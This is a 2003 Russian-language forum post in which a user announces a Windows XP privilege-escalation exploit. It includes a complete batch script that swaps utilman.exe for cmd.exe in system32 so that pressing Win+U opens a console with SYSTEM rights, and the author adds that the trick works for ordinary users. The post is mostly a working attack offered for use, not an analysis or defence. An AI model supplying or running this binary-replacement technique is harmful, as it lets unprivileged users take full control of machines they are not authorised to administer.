Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Очередной эксплоит WinXP 12.02.03 15:35 Число просмотров: 1395
Автор: Sashman Статус: Незарегистрированный пользователь
|
Играясь в Винде ЭксПи с utility manager (\system32\utilman.exe; это такая прога, вызываемая WinKey+U, предназаначеная для всякого рода инвалидов, меня в ней интересовали mousekeys - контроль курсора мышки с клавы), я обнаружил следующую вещь:
при нажатии Win+U запускается 2 utilman'a: один с правами текущего пользователя, второй - угадайте - правильно, с правами SYSTEM.
Отсюда вытекает эксплоит с классической подменой exe-шника:
rem --- XPloit.utilman.bat -------------------------------------------
@echo off
echo WinXP Utility manager exploit. Copyleft (c) Sashman, 2003.
echo Make sure utilman.exe is not runing.
%systemdrive%
cd %windir%\system32\
echo Renaming utilman.exe to utilman.exp...
ren utilman.exe utilman.exp
echo Copying cmd.exe to utilman.exe...
copy cmd.exe utilman.exe
echo Press WinKey-U to obtain a console with SYSTEM privileges.
echo After you're finished, press a key to restore utilman.
pause>>nul
del utilman.exe
echo Renaming utilman.exp to utilman.exe...
ren utilman.exp utilman.exe
echo Good bye.
rem ------------- cut here ------------------------------------------
Правда, есть один нюанс: консоль с системными правами НЕ появляется у юзера с админскими правами, хотя и присутсвует в списке процессов.
(У обычных пользователей она, родимая, появляется, со всеми вытекающими последствиями :) ).
|
- Очередной эксплоит WinXP - Sashman 12.02.03 15:35 [1395]
|
|
|